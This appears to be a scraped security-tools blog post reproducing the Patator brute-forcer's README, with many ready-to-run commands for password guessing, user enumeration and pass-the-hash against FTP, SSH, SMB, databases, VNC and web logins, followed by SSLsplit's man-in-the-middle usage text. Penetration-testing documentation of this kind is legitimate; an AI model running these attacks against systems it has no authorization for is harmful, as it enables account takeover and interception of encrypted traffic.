- mysql_login : Brute-force MySQL
- mysql_queries : Brute-force MySQL queries
- pgsql_login : Brute-force PostgreSQL
- vnc_login : Brute-force VNC
- dns_forward : Brute-force DNS
- dns_reverse : Brute-force DNS (reverse lookup subnets)
- snmp_login : Brute-force SNMPv1/2 and SNMPv3
- unzip_pass : Brute-force the password of encrypted ZIP files
- keystore_pass : Brute-force the password of Java keystore files
Future modules to be implemented:
- rdp_login
The name "Patator" comes from http://www.youtube.com/watch?v=xoBkBvnTTjo
"Whatever the payload to fire, always use the same cannon"
* Why ?
Basically, I got tired of using Medusa, Hydra, Ncrack, Metasploit auxiliary modules, Nmap NSE scripts and the like because:
- they either do not work or are not reliable (got me false negatives several times in the past)
- they are not flexible enough (how to iterate over all wordlists, fuzz any module parameter)
- they lack useful features (display progress or pause during execution)
FEATURES
--------
* No false negatives, as it is the user that decides what results to ignore based on:
+ status code of response
+ size of response
+ matching string or regex in response data
+ ... see --help
* Modular design
+ not limited to network modules (eg. the unzip_pass module)
+ not limited to brute-forcing (eg. remote exploit testing, or vulnerable version probing)
* Interactive runtime
+ show progress during execution (press Enter)
+ pause/unpause execution (press p)
+ increase/decrease verbosity
+ add new actions & conditions during runtime (eg. to exclude more types of response from showing)
+ ... press h to see all available interactive commands
* Use persistent connections (ie. will test several passwords until the server disconnects)
* Multi-threaded
* Flexible user input
- Any module parameter can be fuzzed:
+ use the FILE keyword to iterate over a file
+ use the COMBO keyword to iterate over a combo file
+ use the NET keyword to iterate over every hosts of a network subnet
+ use the RANGE keyword to iterate over hexadecimal, decimal or alphabetical ranges
+ use the PROG keyword to iterage over the output of an external program
- Iteration over the joined wordlists can be done in any order
* Save every response (along with request) to seperate log files for later reviewing
INSTALL
* Dependencies (best tested versions)
| Required for | URL | Version |
--------------------------------------------------------------------------------------------------
paramiko | SSH | http://www.lag.net/paramiko/ | 1.7.7.1 |
--------------------------------------------------------------------------------------------------
pycurl | HTTP | http://pycurl.sourceforge.net/ | 7.19.0 |
--------------------------------------------------------------------------------------------------
openldap | LDAP | http://www.openldap.org/ | 2.4.24 |
--------------------------------------------------------------------------------------------------
impacket | SMB | http://code.google.com/p/impacket/ | svn#765 |
--------------------------------------------------------------------------------------------------
cx_Oracle | Oracle | http://cx-oracle.sourceforge.net/ | 5.1.1 |
--------------------------------------------------------------------------------------------------
mysql-python | MySQL | http://sourceforge.net/projects/mysql-python/ | 1.2.3 |
--------------------------------------------------------------------------------------------------
psycopg | PostgreSQL | http://initd.org/psycopg/ | 2.4.5 |
--------------------------------------------------------------------------------------------------
pycrypto | VNC | http://www.dlitz.net/software/pycrypto/ | 2.3 |
--------------------------------------------------------------------------------------------------
dnspython | DNS | http://www.dnspython.org/ | 1.10.0 |
--------------------------------------------------------------------------------------------------
pysnmp | SNMP | http://pysnmp.sourceforge.net/ | 4.2.1 |
--------------------------------------------------------------------------------------------------
pyasn1 | SNMP | http://sourceforge.net/projects/pyasn1/ | 0.1.2 |
--------------------------------------------------------------------------------------------------
IPy | NETx keywords | https://github.com/haypo/python-ipy | 0.75 |
--------------------------------------------------------------------------------------------------
unzip | ZIP passwords | http://www.info-zip.org/ | 6.0 |
--------------------------------------------------------------------------------------------------
Java | keystore files | http://www.oracle.com/technetwork/java/javase/ | 6 |
--------------------------------------------------------------------------------------------------
python | | http://www.python.org/ | 2.7 |
--------------------------------------------------------------------------------------------------
* Shortcuts (optionnal)
ln -s path/to/patator.py /usr/bin/ftp_login
ln -s path/to/patator.py /usr/bin/http_fuzz
so on ...
USAGE
-----
$ python patator.py <module> -h
or
$ <module> -h (if you created the shortcuts)
There are global options and module options:
- all global options start with - or --
- all module options are of the form option=value
All module options are fuzzable:
---------
./module host=FILE0 port=FILE1 foobar=FILE2.google.FILE3 0=hosts.txt 1=ports.txt 2=foo.txt 3=bar.txt
The keywords (FILE, COMBO, NET, ...) act as place-holders. They indicate the type of wordlist
and where to replace themselves with the actual words to test.
Each keyword is numbered in order to:
- match the corresponding wordlist
- and indicate in what order to iterate over all the wordlists
For instance, this would be the classic order:
---------
$ ./module host=FILE0 user=FILE1 password=FILE2 0=hosts.txt 1=logins.txt 2=passwords.txt
10.0.0.1 root password
10.0.0.1 root 123456
10.0.0.1 root qsdfghj
... (trying all passwords before testing next login)
10.0.0.1 admin password
10.0.0.1 admin 123456
10.0.0.1 admin qsdfghj
... (trying all logins before testing next host)
10.0.0.2 root password
...
While a smarter way might be:
---------
$ ./module host=FILE2 user=FILE1 password=FILE0 2=hosts.txt 1=logins.txt 0=passwords.txt
10.0.0.1 root password
10.0.0.2 root password
10.0.0.1 admin password
10.0.0.2 admin password
10.0.0.1 root 123456
10.0.0.2 root 123456
10.0.0.1 admin 123456
...
* Keywords
Brute-force a list of hosts with a file containing combo entries (each line := login:password).
---------
./module host=FILE0 user=COMBO10 password=COMBO11 0=hosts.txt 1=combos.txt
Scan subnets to just grab version banners.
---------
./module host=NET0 0=10.0.1.0/24,10.0.2.0/24,10.0.3.128-10.0.3.255
Fuzzing a parameter by iterating over a range of values.
---------
./module param=RANGE0 0=hex:0x00-0xffff
./module param=RANGE0 0=int:0-500
./module param=RANGE0 0=lower:a-zzz
* Actions & Conditions
Use the -x option to do specific actions upon receiving expected results. For instance:
To ignore responses with status code 200 *AND* a size within a range.
---------
./module host=10.0.0.1 user=FILE0 -x ignore:code=200,size=57-74
To ignore responses with status code 500 *OR* containing "Internal error".
---------
./module host=10.0.0.1 user=FILE0 -x ignore:code=500 -x ignore:fgrep='Internal error'
Remember that conditions are ANDed within the same -x option, use multiple -x options to
specify ORed conditions.
* Failures
During execution, failures may happen, such as a TCP connect timeout for
instance. A failure is actually an exception that the module does not expect,
and as a result the exception is caught upstream by the controller.
Such exceptions, or failures, are not immediately reported to the user, the
controller will retry 4 more times (see --max-retries) before reporting the
failed payload with logging level "FAIL".
* Read carefully the following examples to get a good understanding of how patator works.
{{{ FTP
* Brute-force authentication. Do not report wrong passwords.
---------
ftp_login host=10.0.0.1 user=FILE0 password=FILE1 0=logins.txt 1=passwords.txt -x ignore:mesg='Login incorrect.'
NB0. If you get errors like "500 OOPS: priv_sock_get_cmd", use -x ignore,reset,retry:code=500
in order to retry the last login/password using a new TCP connection. Odd servers like vsftpd
return this when they shut down the TCP connection (ie. max login attempts reached).
NB1. If you get errors like "too many connections from your IP address", try decreasing the number of
threads, the server may be enforcing a maximum number of concurrent connections.
* Same as before, but stop testing a user after his password is found.
---------
ftp_login ... -x free=user:code=0
* Find anonymous FTP servers on a subnet.
---------
ftp_login host=NET0 user=anonymous password=test@example.com 0=10.0.0.0/24
}}}
{{{ SSH
* Brute-force authentication with password same as login (aka single mode). Do not report wrong passwords.
---------
ssh_login host=10.0.0.1 user=FILE0 password=FILE0 0=logins.txt -x ignore:mesg='Authentication failed.'
NB. If you get errors like "Error reading SSH protocol banner ... Connection reset by peer",
try decreasing the number of threads, the server may be enforcing a maximum
number of concurrent connections (eg. MaxStartups in OpenSSH).
* Brute-force several hosts and stop testing a host after a valid password is found.
---------
ssh_login host=FILE0 user=FILE1 password=FILE2 0=hosts.txt 1=logins.txt 2=passwords.txt -x free=host:code=0
* Same as previous, but stop testing a user on a host after his password is found.
---------
ssh_login host=FILE0 user=FILE1 password=FILE2 0=hosts.txt 1=logins.txt 2=passwords.txt -x free=host+user:code=0
}}}
{{{ Telnet
* Brute-force authentication.
(a) Enter login after first prompt is detected, enter password after second prompt.
(b) The regex to detect the login and password prompts.
(c) Reconnect when we get no login prompt back (max number of tries reached or successful login).
(a)
telnet_login host=10.0.0.1 inputs='FILE0\nFILE1' 0=logins.txt 1=passwords.txt
prompt_re='tux login:|Password:' -x reset:egrep!='Login incorrect.+tux login:'
(b) (c)
NB. If you get errors like "telnet connection closed", try decreasing the number of threads,
the server may be enforcing a maximum number of concurrent connections.
}}}
{{{ SMTP
* Enumerate valid users using the VRFY command.
(a) Do not report invalid recipients.
(b) Do not report when the server shuts us down with "421 too many errors",
reconnect and resume testing.
(a)
smtp_vrfy host=10.0.0.1 user=FILE0 0=logins.txt -x ignore:fgrep='User unknown in local
recipient table' -x ignore,reset,retry:code=421
(b)
* Use the RCPT TO command in case the VRFY command is not available.
smtp_rcpt host=10.0.0.1 user=FILE0@localhost 0=logins.txt helo='ehlo mx.fb.com' mail_from=root
* Brute-force authentication.
(a) Send a fake hostname (by default your host fqdn is sent)
(a)
smtp_login host=10.0.0.1 helo='ehlo its.me.com' user=FILE0@dom.com password=FILE1 0=logins.txt 1=passwords.txt
}}}
{{{ HTTP
* Find hidden web resources.
(a) Use a specific header.
(b) Follow redirects.
(c) Do not report 404 errors.
(d) Retry on 500 errors.
--------- (a)
http_fuzz url=http://localhost/FILE0 0=words.txt header='Cookie: SESSID=A2FD8B2DA4'
follow=1 -x ignore:code=404 -x ignore,retry:code=500
(b) (c) (d)
NB. You may be able to go 10 times faster using webef (http://www.hsc.fr/ressources/outils/webef/).
It is the fastest HTTP brute-forcer I know, yet at the moment it still lacks useful features
that will prevent you from performing the following attacks.
* Brute-force phpMyAdmin logon.
(a) Use POST requests.
(b) Follow redirects using cookies sent by server.
(c) Ignore failed authentications.
(a) (b) (b)
http_fuzz url=http://10.0.0.1/phpmyadmin/index.php method=POST follow=1 accept_cookie=1
body='pma_username=root&pma_password=FILE0&server=1&lang=en' 0=passwords.txt
-x ignore:fgrep='Cannot log in to the MySQL server'
(c)
* Scan subnet for directory listings.
(a) Ignore not matching reponses.
(b) Save matching responses into directory.
http_fuzz url=http://NET0/FILE1 0=10.0.0.0/24 1=dirs.txt -x ignore:fgrep!='Index of'
-l /tmp/directory_listings (a)
(b)
* Brute-force Basic authentication.
(a) Single mode (login == password).
(b) Do not report failed login attempts.
http_fuzz url=http://10.0.0.1/manager/html user_pass=FILE0:FILE0 0=logins.txt -x ignore:code=401
(a) (b)
* Find hidden virtual hosts.
(a) Read template from file.
(b) Fuzz both the Host and User-Agent headers.
echo -e 'Host: FILE0\nUser-Agent: FILE1' > headers.txt
http_fuzz url=http://10.0.0.1/ header=@headers.txt 0=vhosts.txt 1=agents.txt
(a) (b)
* Brute-force logon using GET requests.
(a) Encode everything surrounded by the two tags _@@_ in hexadecimal.
(b) Ignore HTTP 200 responses with a content size (header+body) within given range
and that also contain the given string.
(c) Use a different delimiter string because the comma cannot be escaped.
(a) (a)
http_fuzz url='http://10.0.0.1/login?username=admin&password=_@@_FILE0_@@_' -e _@@_:hex
0=words.txt -x ignore:'code=200|size=1500-|fgrep=Welcome, unauthenticated user' -X '|'
(b) (c)
* Brute-force logon that enforces two random nonces to be submitted along every POST.
(a) First, request the page that provides the nonces as hidden input fields.
(b) Use regular expressions to extract the nonces that are to be submitted along the main request.
http_fuzz url=http://10.0.0.1/login method=POST body='user=admin&pass=FILE0&nonce1=_N1_&nonce2=_N2_' 0=passwords.txt accept_cookie=1
before_urls=http://10.0.0.1/index before_egrep='_N1_:<input type="hidden" name="nonce1" value="(\w+)"|_N2_:name="nonce2" value="(\w+)"'
(a) (b)
* Test the OPTIONS method against a list of URLs.
(a) Ignore URLs that only allow the HEAD and GET methods.
(b) Header end of line is '\r\n'.
(c) Use a different delimiter string because the comma cannot be escaped.
http_fuzz url=FILE0 0=urls.txt method=OPTIONS -x ignore:egrep='^Allow: HEAD, GET\r$' -X '|'
(a) (b) (c)
}}}
{{{ LDAP
* Brute-force authentication.
(a) Do not report wrong passwords.
(b) Talk SSL/TLS to port 636.
ldap_login host=10.0.0.1 binddn='cn=FILE0,dc=example,dc=com' 0=logins.txt bindpw=FILE1 1=passwords.txt
-x ignore:mesg='ldap_bind: Invalid credentials (49)' ssl=1 port=636
(a) (b)
}}}
{{{ SMB
* Brute-force authentication.
smb_login host=10.0.0.1 user=FILE0 password=FILE1 0=logins.txt 1=passwords.txt -x ignore:fgrep=STATUS_LOGON_FAILURE
NB. If you suddenly get STATUS_ACCOUNT_LOCKED_OUT errors for an account
although it is not the first password you test on this account, then you must
have locked it.
* Pass-the-hash.
(a) Test a list of hosts.
(b) Test every user (each line := login:rid:LM hash:NT hash).
smb_login host=FILE0 0=hosts.txt user=COMBO10 password_hash=COMBO12:COMBO13 1=pwdump.txt -x ...
(a) (b)
}}}
{{{ MSSQL
* Brute-force authentication.
mssql_login host=10.0.0.1 user=sa password=FILE0 0=passwords.txt -x ignore:fgrep='Login failed for user'
}}}
{{{ Oracle
Beware, by default in Oracle, accounts are permanently locked out after 10 wrong passwords,
except for the SYS account.
* Brute-force authentication.
oracle_login host=10.0.0.1 user=SYS password=FILE0 0=passwords.txt sid=ORCL -x ignore:code=ORA-01017
NB0. With Oracle 10g XE (Express Edition), you do not need to pass a SID.
NB1. If you get ORA-12516 errors, it may be because you reached the limit of
concurrent connections or db processes, try using "--rate-limit 0.5 -t 2" to be
more polite. Also you can run "alter system set processes=150 scope=spfile;"
and restart your database to get rid of this.
* Brute-force SID.
oracle_login host=10.0.0.1 sid=FILE0 0=sids.txt -x ignore:code=ORA-12505
NB. Against Oracle9, it may crash (Segmentation fault) as soon as a valid SID is
found (cx_Oracle bug). Sometimes, the SID gets printed out before the crash,
so try running the same command again if it did not.
}}}
{{{ MySQL
* Brute-force authentication.
mysql_login host=10.0.0.1 user=FILE0 password=FILE0 0=logins.txt -x ignore:fgrep='Access denied for user'
}}}
{{{ PostgresSQL
* Brute-force authentication.
-----------
pgsql_login host=10.0.0.1 user=postgres password=FILE0 0=passwords.txt -x ignore:fgrep='password authentication failed'
}}}
{{{ VNC
Some VNC servers have built-in anti-bruteforce functionnality that temporarily
blacklists the attacker IP address after too many wrong passwords.
- RealVNC-4.1.3 or TightVNC-1.3.10 for example, allow 5 failed attempts and
then enforce a 10 second delay. For each subsequent failed attempt that
delay is doubled.
- RealVNC-3.3.7 or UltraVNC allow 6 failed attempts and then enforce a 10
second delay between each following attempt.
* Brute-force authentication.
(a) No need to use more than one thread.
(b) Keep retrying the same password when we are blacklisted by the server.
(c) Exit execution as soon as a valid password is found.
--------- (a)
vnc_login host=10.0.0.1 password=FILE0 0=passwords.txt --threads 1
-x retry:fgrep!='Authentication failure' --max-retries -1 -x quit:code=0
(b) (b) (c)
}}}
{{{ DNS
* Brute-force subdomains.
(a) Ignore NXDOMAIN responses (rcode 3).
dns_forward name=FILE0.google.com 0=names.txt -x ignore:code=3
(a)
* Brute-force domain with every possible TLDs.
dns_forward name=google.MOD0 0=TLD -x ignore:code=3
* Brute-force SRV records.
dns_forward name=MOD0.microsoft.com 0=SRV qtype=SRV -x ignore:code=3
* Grab the version of several hosts.
dns_forward server=FILE0 0=hosts.txt name=version.bind qtype=txt qclass=ch
* Reverse lookup several networks.
(a) Ignore names that do not contain 'google.com'.
dns_reverse host=NET0 0=216.239.32.0-216.239.47.255,8.8.8.0/24 -x ignore:code=3 -x ignore:fgrep!=google.com -x ignore:fgrep=216-239-
(a) (b)
}}}
{{{ SNMP
* SNMPv1/2 : Find valid community names.
----------
snmp_login host=10.0.0.1 community=FILE0 1=names.txt -x ignore:mesg='No SNMP response received before timeout'
* SNMPv3 : Find valid usernames.
----------
snmp_login host=10.0.0.1 version=3 user=FILE0 0=logins.txt -x ignore:mesg=unknownUserName
* SNMPv3 : Find valid passwords.
----------
snmp_login host=10.0.0.1 version=3 user=myuser auth_key=FILE0 0=passwords.txt -x ignore:mesg=wrongDigest
NB0. If you get "notInTimeWindow" error messages, increase the retries option.
NB1. SNMPv3 requires passphrases to be at least 8 characters long.
}}}
{{{ Unzip
* Brute-force the ZIP file password (cracking older pkzip encryption used to be not supported in JtR).
----------
unzip_pass zipfile=path/to/file.zip password=FILE0 0=passwords.txt -x ignore:code!=0
}}}
CHANGELOG
* v0.5 2013/07/05
- new modules: mysql_query, tcp_fuzz
- new RANGE and PROG keywords (supersedes the reading from stdin feature)
- switched to impacket for mssql_login
- output more intuitive
- fixed connection cache
- minor bug fixes</span></code></pre>
<pre style="font-family: 'andale mono', 'lucida console', monospace; font-size: 13px; line-height: 18px; margin-bottom: 20px; margin-top: 20px; overflow: auto; padding: 0px; white-space: pre-wrap;"><code style="font-family: 'andale mono', 'lucida console', monospace; margin: 0px; padding: 0px;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">
</span></code></pre>
<pre style="font-family: 'andale mono', 'lucida console', monospace; font-size: 13px; line-height: 18px; margin-bottom: 20px; margin-top: 20px; overflow: auto; padding: 0px; white-space: pre-wrap;"><code style="font-family: 'andale mono', 'lucida console', monospace; margin: 0px; padding: 0px;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Source-</span></code></pre>
<pre style="font-family: 'andale mono', 'lucida console', monospace; font-size: 13px; line-height: 18px; margin-bottom: 20px; margin-top: 20px; overflow: auto; padding: 0px; white-space: pre-wrap;"><code style="font-family: 'andale mono', 'lucida console', monospace; margin: 0px; padding: 0px;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="http://packetstormsecurity.com/files/122392/Patator-Brute-Forcer-0.5.html" style="outline: none;">http://packetstormsecurity.com/files/122392/Patator-Brute-Forcer-0.5.html</a></span></code></pre>
<pre style="font-family: 'andale mono', 'lucida console', monospace; font-size: 13px; line-height: 18px; margin-bottom: 20px; margin-top: 20px; overflow: auto; padding: 0px; white-space: pre-wrap;"><code style="font-family: 'andale mono', 'lucida console', monospace; margin: 0px; padding: 0px;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">
</span></code></pre>
<pre style="font-family: 'andale mono', 'lucida console', monospace; font-size: 13px; line-height: 18px; margin-bottom: 20px; margin-top: 20px; overflow: auto; padding: 0px; white-space: pre-wrap;"><code style="font-family: 'andale mono', 'lucida console', monospace; margin: 0px; padding: 0px;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Website-</span></code></pre>
<pre style="font-family: 'andale mono', 'lucida console', monospace; font-size: 13px; line-height: 18px; margin-bottom: 20px; margin-top: 20px; overflow: auto; padding: 0px; white-space: pre-wrap;"><code style="font-family: 'andale mono', 'lucida console', monospace; margin: 0px; padding: 0px;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="https://code.google.com/p/patator/" style="outline: none;">https://code.google.com/p/patator/</a></span></code></pre>
<pre style="font-family: 'andale mono', 'lucida console', monospace; font-size: 13px; line-height: 18px; margin-bottom: 20px; margin-top: 20px; overflow: auto; padding: 0px; white-space: pre-wrap;"><code style="font-family: 'andale mono', 'lucida console', monospace; margin: 0px; padding: 0px;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">
</span></code></pre>
<pre style="font-family: 'andale mono', 'lucida console', monospace; font-size: 13px; line-height: 18px; margin-bottom: 20px; margin-top: 20px; overflow: auto; padding: 0px; white-space: pre-wrap;"><code style="font-family: 'andale mono', 'lucida console', monospace; margin: 0px; padding: 0px;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Screenshot -</span></code></pre>
<div class="separator" style="clear: both; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmp57sqprPsOSVyP1wbCxHJ-5qbhXkz7ACSabZYgMOw8ubtKOSKxLmkRJPRbvZspesOLk6-i_h8Eo4qd46JptZ55YUl9lFLYAgdnc5y-CQRPehCttUVfNOcZrJ1E9PspAmiahOdKM7ATsN/s1600/patator.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; outline: none; text-decoration: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;"><img border="0" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmp57sqprPsOSVyP1wbCxHJ-5qbhXkz7ACSabZYgMOw8ubtKOSKxLmkRJPRbvZspesOLk6-i_h8Eo4qd46JptZ55YUl9lFLYAgdnc5y-CQRPehCttUVfNOcZrJ1E9PspAmiahOdKM7ATsN/s1600/patator.JPG" style="border: none; padding: 0px;" width="400" /></span></span></a></div>
</div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0tag:blogger.com,1999:blog-3265662506015756178.post-25220996785024363752013-09-02T14:18:00.001-07:002013-09-02T14:18:25.173-07:00SSLsplit 0.4.7 – tool for man-in-the-middle attacks against SSL/TLS encrypted network connections<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif; font-size: 13px; line-height: 20px;">SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encrypted network connections. Connections are transparently intercepted through a network address translation engine and redirected to SSLsplit. SSLsplit terminates SSL/TLS and initiates a new SSL/TLS connection to the original destination address, while logging all data transmitted. SSLsplit is intended to be useful for network forensics and penetration testing.<br /><br />SSLsplit supports plain TCP, plain SSL, HTTP and HTTPS connections over both IPv4 and IPv6. For SSL and HTTPS connections, SSLsplit generates and signs forged X509v3 certificates on-the-fly, based on the original server certificate subject DN and subjectAltName extension. SSLsplit fully supports Server Name Indication (SNI) and is able to work with RSA, DSA and ECDSA keys and DHE and ECDHE cipher suites. SSLsplit can also use existing certificates of which the private key is available, instead of generating forged ones. SSLsplit supports NULL-prefix CN certificates and can deny OCSP requests in a generic way. SSLsplit removes HPKP response headers in order to prevent public key pinning.</span></span><br />
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span><div style="line-height: 1.5em; margin-bottom: 1em; padding: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Latest release: <a class="external" href="http://mirror.roe.ch/rel/sslsplit/sslsplit-0.4.7.tar.bz2" style="outline: none; text-decoration: none;">sslsplit-0.4.7.tar.bz2</a> (<a class="external" href="http://mirror.roe.ch/rel/sslsplit/sslsplit-latest.1.txt" style="outline: none; text-decoration: none;">sslsplit(1)</a>)</span></div>
<h2 style="font-size: 30px; font-weight: normal; line-height: 1; margin: 0.1875em 0px; padding: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Usage</span></h2>
<pre style="font-family: 'andale mono', 'lucida console', monospace; line-height: 18px; margin-bottom: 1.5em; margin-top: 20px; padding: 0px;"><code class=" sql" style="display: block; font-family: 'andale mono', 'lucida console', monospace;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">% sslsplit -h
<span class="keyword" style="font-weight: bold;">Usage</span>: sslsplit [options...] [proxyspecs...]
-c pemfile use CA cert (<span class="keyword" style="font-weight: bold;">and</span> <span class="keyword" style="font-weight: bold;">key</span>) <span class="keyword" style="font-weight: bold;">from</span> pemfile <span class="keyword" style="font-weight: bold;">to</span> sign forged certs
-k pemfile use CA <span class="keyword" style="font-weight: bold;">key</span> (<span class="keyword" style="font-weight: bold;">and</span> cert) <span class="keyword" style="font-weight: bold;">from</span> pemfile <span class="keyword" style="font-weight: bold;">to</span> sign forged certs
-C pemfile use CA chain <span class="keyword" style="font-weight: bold;">from</span> pemfile (intermediate <span class="keyword" style="font-weight: bold;">and</span> root CA certs)
-K pemfile use <span class="keyword" style="font-weight: bold;">key</span> <span class="keyword" style="font-weight: bold;">from</span> pemfile <span class="keyword" style="font-weight: bold;">for</span> leaf certs (<span class="keyword" style="font-weight: bold;">default</span>: generate)
-t certdir use cert+chain+<span class="keyword" style="font-weight: bold;">key</span> PEM files <span class="keyword" style="font-weight: bold;">from</span> certdir <span class="keyword" style="font-weight: bold;">to</span> target <span class="keyword" style="font-weight: bold;">all</span> sites
matching the common <span class="keyword" style="font-weight: bold;">names</span> (non-matching: generate if CA)
-O deny <span class="keyword" style="font-weight: bold;">all</span> OCSP requests <span class="keyword" style="font-weight: bold;">on</span> <span class="keyword" style="font-weight: bold;">all</span> proxyspecs
-P passthrough SSL connections if they cannot be split because <span class="keyword" style="font-weight: bold;">of</span>
client cert auth <span class="keyword" style="font-weight: bold;">or</span> <span class="keyword" style="font-weight: bold;">no</span> matching cert <span class="keyword" style="font-weight: bold;">and</span> <span class="keyword" style="font-weight: bold;">no</span> CA (<span class="keyword" style="font-weight: bold;">default</span>: <span class="keyword" style="font-weight: bold;">drop</span>)
-g pemfile use DH <span class="keyword" style="font-weight: bold;">group</span> params <span class="keyword" style="font-weight: bold;">from</span> pemfile (<span class="keyword" style="font-weight: bold;">default</span>: keyfiles <span class="keyword" style="font-weight: bold;">or</span> auto)
-G curve use ECDH named curve (<span class="keyword" style="font-weight: bold;">default</span>: secp160r2 <span class="keyword" style="font-weight: bold;">for</span> non-RSA leafkey)
-Z disable SSL/TLS compression <span class="keyword" style="font-weight: bold;">on</span> <span class="keyword" style="font-weight: bold;">all</span> connections
-s ciphers use the given OpenSSL cipher suite spec (<span class="keyword" style="font-weight: bold;">default</span>: <span class="keyword" style="font-weight: bold;">ALL</span>:-aNULL)
-e engine specify <span class="keyword" style="font-weight: bold;">default</span> NAT engine <span class="keyword" style="font-weight: bold;">to</span> use (<span class="keyword" style="font-weight: bold;">default</span>: ipfw)
-E list available NAT engines <span class="keyword" style="font-weight: bold;">and</span> exit
-u <span class="keyword" style="font-weight: bold;">user</span> <span class="keyword" style="font-weight: bold;">drop</span> <span class="keyword" style="font-weight: bold;">privileges</span> <span class="keyword" style="font-weight: bold;">to</span> <span class="keyword" style="font-weight: bold;">user</span> (<span class="keyword" style="font-weight: bold;">default</span> if run <span class="keyword" style="font-weight: bold;">as</span> root: nobody)
-j jaildir chroot() <span class="keyword" style="font-weight: bold;">to</span> jaildir (<span class="keyword" style="font-weight: bold;">default</span> if run <span class="keyword" style="font-weight: bold;">as</span> root: /var/empty)
-p pidfile <span class="keyword" style="font-weight: bold;">write</span> pid <span class="keyword" style="font-weight: bold;">to</span> pidfile (<span class="keyword" style="font-weight: bold;">default</span>: <span class="keyword" style="font-weight: bold;">no</span> pid file)
-l logfile <span class="keyword" style="font-weight: bold;">connect</span> log: log one line summary per <span class="keyword" style="font-weight: bold;">connection</span> <span class="keyword" style="font-weight: bold;">to</span> logfile
-L logfile content log: <span class="keyword" style="font-weight: bold;">full</span> data <span class="keyword" style="font-weight: bold;">to</span> file <span class="keyword" style="font-weight: bold;">or</span> named pipe (excludes -S)
-S logdir content log: <span class="keyword" style="font-weight: bold;">full</span> data <span class="keyword" style="font-weight: bold;">to</span> separate files <span class="keyword" style="font-weight: bold;">in</span> dir (excludes -L)
-d daemon mode: run <span class="keyword" style="font-weight: bold;">in</span> background, log error messages <span class="keyword" style="font-weight: bold;">to</span> syslog
-D debug mode: run <span class="keyword" style="font-weight: bold;">in</span> foreground, log debug messages <span class="keyword" style="font-weight: bold;">on</span> stderr
-V print version information <span class="keyword" style="font-weight: bold;">and</span> exit
-h print <span class="keyword" style="font-weight: bold;">usage</span> information <span class="keyword" style="font-weight: bold;">and</span> exit
proxyspec = type listenaddr+port [natengine|targetaddr+port|<span class="string">"sni"</span>+port]
e.g. http <span class="number">0.0</span>.<span class="number">0.0</span> <span class="number">8080</span> www.roe.ch <span class="number">80</span> # http/<span class="number">4</span>; static hostname dst
https ::<span class="number">1</span> <span class="number">8443</span> <span class="number">2001</span>:db8::<span class="number">1</span> <span class="number">443</span> # https/<span class="number">6</span>; static address dst
https <span class="number">127.0</span>.<span class="number">0.1</span> <span class="number">9443</span> sni <span class="number">443</span> # https/<span class="number">4</span>; SNI DNS lookups
tcp <span class="number">127.0</span>.<span class="number">0.1</span> <span class="number">10025</span> # tcp/<span class="number">4</span>; <span class="keyword" style="font-weight: bold;">default</span> NAT engine
ssl <span class="number">2001</span>:db8::<span class="number">2</span> <span class="number">9999</span> pf # ssl/<span class="number">6</span>; NAT engine <span class="string">'pf'</span>
Example:
sslsplit -k ca.<span class="keyword" style="font-weight: bold;">key</span> -c ca.pem -P https <span class="number">127.0</span>.<span class="number">0.1</span> <span class="number">8443</span> https ::<span class="number">1</span> <span class="number">8443</span>
</span></code></pre>
<div style="line-height: 1.5em; margin-bottom: 1em; padding: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">See the manual page <a class="external" href="http://mirror.roe.ch/rel/sslsplit/sslsplit-latest.1.txt" style="outline: none; text-decoration: none;">sslsplit(1)</a> for details on using SSLsplit and setting up the various NAT engines.</span></div>
<h2 style="font-size: 30px; font-weight: normal; line-height: 1; margin: 0.1875em 0px; padding: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Requirements</span></h2>
<div style="line-height: 1.5em; margin-bottom: 1em; padding: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">SSLsplit depends on the OpenSSL and libevent 2.x libraries. The build depends on GNU make and a POSIX.2 environment in <code style="font-family: 'andale mono', 'lucida console', monospace; line-height: 18px;">PATH</code>. The (optional) unit tests depend on check.</span></div>
<div style="line-height: 1.5em; margin-bottom: 1em; padding: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">SSLsplit currently supports the following operating systems and NAT engines:</span></div>
<ul style="list-style-position: outside; margin: 1em 20px 1em 0px; padding-left: 1.4em;">
<li style="line-height: 1.5em; list-style-type: square;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">FreeBSD: pf rdr, ipfw fwd, ipfilter rdr</span></li>
<li style="line-height: 1.5em; list-style-type: square;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">OpenBSD: pf rdr</span></li>
<li style="line-height: 1.5em; list-style-type: square;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Linux: netfilter REDIRECT and TPROXY</span></li>
<li style="line-height: 1.5em; list-style-type: square;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Mac OS X: ipfw fwd</span></li>
</ul>
